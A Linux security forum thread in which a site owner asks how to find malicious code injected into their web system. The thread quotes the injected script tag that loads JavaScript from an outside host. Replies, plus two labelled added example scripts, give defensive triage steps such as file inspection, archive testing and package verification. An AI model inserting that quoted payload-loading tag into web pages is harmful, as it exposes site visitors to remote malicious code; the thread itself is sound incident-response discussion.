LinuxQuestions.org
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Old 02-28-2014, 07:19 AM   #1
adumith
Member
 
Registered: Feb 2013
Posts: 46

Rep: Reputation: Disabled
How to detect malicious code on Linux


Greetings,

This time I want to ask you for some special support; since yesterday I have had problems with the content of our system.

Investigating the situation, we've found that someone has included malicious code on our system containing this script: <script src="http://csjq.hol.es/xs.js"/script>. This one was built with a tool called makeself.

Reading about this tool we found that makeself is a small shell script that generates a self-extractable compressed TAR archive from a directory. The resulting file appears as a shell script, and can be launched as is. The archive will then uncompress itself to a temporary directory and an arbitrary command will be executed (for example, an installation script).

So, can anybody help me identify which scripts or files this tool generated?

Thanks in advance.
 
Old 02-28-2014, 09:55 AM   #2
linosaurusroot
Member
 
Registered: Oct 2012
Distribution: OpenSuSE,RHEL,Fedora,OpenBSD
Posts: 982
Blog Entries: 2

Rep: Reputation: 244
You could look for files with a ctime later than about the time of the hostile activity.

You could extract a tarfile once you have found it.

On a disposable system a trick for capturing self-extracting content is to have an append-only filesystem that you extract on and the code will fail to delete its traces. You could rig this using NFS or a kernel with unlink() not implemented. Directory attributes also work provided the extraction uses the directory in question.
 
Old 02-28-2014, 10:57 AM   #3
Habitual
LQ Veteran
 
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Blog Entries: 37

Rep: Reputation: Disabled
Quote:
Originally Posted by adumith
<script src="http://csjq.hol.es/xs.js"/script>
Now, what about the entire suspect code/line?
That is a very small piece of code and I'd think there would be more to it.
 
Old 02-28-2014, 11:36 AM   #4
metaschima
Senior Member
 
Registered: Dec 2013
Distribution: Slackware
Posts: 1,982

Rep: Reputation: 492
Some things you can try:

1) Use the 'file' command to see if it is a binary file.
2) Use
Code:
grep '^#!/bin/.*sh' new.sh   # matches a #!/bin/sh-style shebang line
to see if it is a script, and then use 7zip to try and extract the file; if it succeeds then it does contain an archive:
Code:
if 7z t new.sh ; then echo "File contains archive"; fi
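The checks above, carried one step further as an added example (not code from this thread): a small triage script that tests for a shell shebang, for the comment line makeself writes into its header, and for archive magic bytes at the line the header's skip= variable points to. The header conventions (the Makeself comment and the skip=N line) are assumptions about makeself output, and the sample file is constructed in the script itself.

```shell
#!/bin/sh
# Added example, not from the thread: triage a file suspected of being a
# makeself-style self-extracting script. Assumes the makeself header
# conventions: a "# This script was generated using Makeself" comment and a
# "skip=N" line giving the line number where the appended archive begins.
# First four bytes of stdin as lowercase hex, e.g. "1f8b0808" for gzip.
magic4() { od -An -N4 -tx1 | tr -d ' \n'; }

# classify_payload FILE: prints gzip|bzip2|xz|none for the bytes that
# follow the shell header; returns 1 when no archive is found.
classify_payload() {
    f=$1
    skip=$(sed -n 's/^skip="\{0,1\}\([0-9][0-9]*\).*/\1/p' "$f" | head -n 1)
    [ -n "$skip" ] || { echo none; return 1; }
    case $(tail -n +"$skip" "$f" | magic4) in
        1f8b*)    echo gzip ;;
        425a68*)  echo bzip2 ;;
        fd377a58) echo xz ;;
        *)        echo none; return 1 ;;
    esac
}

# triage FILE: shebang check, makeself marker check, then payload check.
triage() {
    f=$1
    head -n 1 "$f" | grep -q '^#!/bin/.*sh' || { echo "$f: not a shell script"; return 1; }
    grep -q '^# This script was generated using Makeself' "$f" &&
        echo "$f: makeself header present"
    if p=$(classify_payload "$f"); then
        echo "$f: embedded $p archive found after the header"
    else
        echo "$f: no embedded archive found"; return 1
    fi
}

# make_sample OUT: writes a constructed stand-in for a makeself script. The
# payload is only the gzip magic bytes, not a real archive, so nothing here
# can be extracted or run.
make_sample() {
    {
        printf '#!/bin/sh\n'
        printf '# This script was generated using Makeself 2.2.0\n'
        printf 'skip=5\n'
        printf 'tail -n +$skip "$0" | gzip -dc | tar x; exit 0\n'
        printf '\037\213\010\010'
    } > "$1"
}

# Usage: sh triage.sh suspect_file...
for f in "$@"; do triage "$f"; done
```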
 
Old 03-03-2014, 06:43 PM   #5
byau
Member
 
Registered: Sep 2009
Location: Los Angeles, CA
Posts: 33

Rep: Reputation: 5
Use "file" to find out what kind of file it is. If it is ASCII text or a script, you should be able to view it.

You can use "strings" to view any type of characters it can find, even in a binary.

Also, you can find out if any system files have been compromised (usually in /bin or /usr/bin) by running rpm -qV (V = verify). It will tell you which files have been changed since the original package installation. To view everything:

rpm -qaV

This will take a while.

And of course you'll need someone linux-proficient to go through the output and know which files are supposed to have been changed since installation (e.g. /etc/passwd).

And you'll also have to look in those files and see whether the changes are expected or not (who knows the proper users in /etc/passwd?).

But if it shows you, for example, that /bin/ls has changed since install, that is fishy.
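Going through rpm -qaV output by hand is the slow part of this advice; as an added example (not from the post), the filter below separates the cases the reply describes: non-config files whose size or digest changed (the /bin/ls case), config files that are expected to change (the /etc/passwd case), and files that have gone missing. The sample lines are constructed in the rpm -V format, not taken from a real system.

```shell
#!/bin/sh
# Added example, not from the thread: triage "rpm -V" / "rpm -qaV" output.
# Each line is a 9-character attribute string (S size, M mode, 5 digest,
# D device, L link, U user, G group, T mtime, P caps), an optional file
# type letter (c = config file), and the path; "missing" replaces the
# attributes when the file is gone.

# triage_rpm_verify: reads rpm -V lines on stdin and prints
#   MODIFIED <path>        non-config file whose size or digest changed
#   CONFIG-CHANGED <path>  config file changed (expected, but review it)
#   MISSING <path>         packaged file no longer present
# A bare mtime change ("T" only) is ignored: it is common after updates.
triage_rpm_verify() {
    awk '
    $1 == "missing" { print "MISSING " $NF; next }
    {
        attr = $1; path = $NF; ftype = (NF >= 3) ? $2 : "-"
        changed = (attr ~ /[S5]/)
        if (changed && ftype != "c")      print "MODIFIED " path
        else if (changed)                 print "CONFIG-CHANGED " path
    }'
}

# Constructed sample output in rpm -V format (not from a real system).
SAMPLE='S.5....T.    /bin/ls
.......T.    /usr/bin/vim
S.5....T.  c /etc/passwd
.......T.  c /etc/ssh/sshd_config
missing     /usr/sbin/sshd'

# count_modified: number of MODIFIED findings in the sample (printed to stdout).
count_modified() { printf '%s\n' "$SAMPLE" | triage_rpm_verify | grep -c '^MODIFIED '; }

# Live use on an RPM-based host:  rpm -qaV 2>/dev/null | triage_rpm_verify
```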
 
Old 03-04-2014, 08:00 AM   #6
sundialsvcs
LQ Guru
 
Registered: Feb 2004
Location: SE Tennessee, USA
Distribution: Gentoo, LFS
Posts: 10,659
Blog Entries: 4

Rep: Reputation: 3940
Nevermind what it is ... how did it get there?

If someone was capable of modifying your delivered web-page at all, then some part of your system has been compromised. (Or else you have a rogue employee ...)
 
Old 03-04-2014, 01:06 PM   #7
Habitual
LQ Veteran
 
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Blog Entries: 37

Rep: Reputation: Disabled
Quote:
Originally Posted by sundialsvcs
how did it get there?
So much time wasted on what it is or what's in it... who cares? All I'd need to know is that I, or my system, did not put it there, and that makes it immediately suspect.

This is the task you SHOULD BE FOCUSED ON.

http://www.unmaskparasites.com/secur...www.domain.com
Pay direct attention to "External References"

sitecheck.sucuri.net/results/www.domain.com
http://evuln.com/tools/malware-scanner/www.domian.com
and
http://wepawet.cs.ucsb.edu/index.php (URL: field)

You may have (and I suspect if there's one, there's 1++)
 